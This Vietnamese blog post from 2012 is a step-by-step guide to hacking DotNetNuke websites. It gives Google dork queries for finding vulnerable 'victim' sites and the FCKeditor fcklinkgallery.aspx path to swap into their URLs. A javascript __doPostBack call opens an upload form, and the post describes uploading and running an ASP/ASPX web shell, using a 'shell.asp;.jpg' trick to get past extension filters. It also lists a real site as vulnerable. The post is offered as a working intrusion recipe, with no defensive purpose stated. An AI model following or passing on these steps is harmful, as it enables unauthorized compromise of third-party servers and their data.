Thứ Sáu, 29 tháng 6, 2012

Demo Hack Web Bằng Kỹ Thuật DNN (DotNet Nuke)

Bước 1: Sử dụng google để tìm site chứa lỗ hổng DNN
:inurl:/tabid/36/language/en-US/Default.aspx
Inurl:”/portals/0” 
Bước 2: Chọn  1 victim bất kỳ, ví dụ:
Bước 3: Thay thế đoạn url sau:
/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lúc đó, đường link của victim như sau:

Thông tin thu được:




 
Bước 4: Tích vào File (A File on your site)
     

Sau đó thay thế đường link  bằng đoạn mã Script đơn giản sau:
javascript:__doPostBack('ctlURL$cmdUpload','') 

Sau khi chạy địa chỉ url ở trên sẽ xuất hiện giao diện cho upload file
Bước 5: Upload shell
Click Browse và upload shell .asp or. aspx


Thêm 1 số kỹ thuật upload shell đối với asp,
- Có thể bypass đuôi file shell sang dạng ảnh như sau: shell.asp;.jpg.
- Hoặc sử dụng tool http live herder or tamper data….
Bước 6: Run shell
Path đường dẫn để http://www.victim.com.vn//portals/0/tên shell
Một số site dính DNN:
http://www.seth.pt/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Không có nhận xét nào: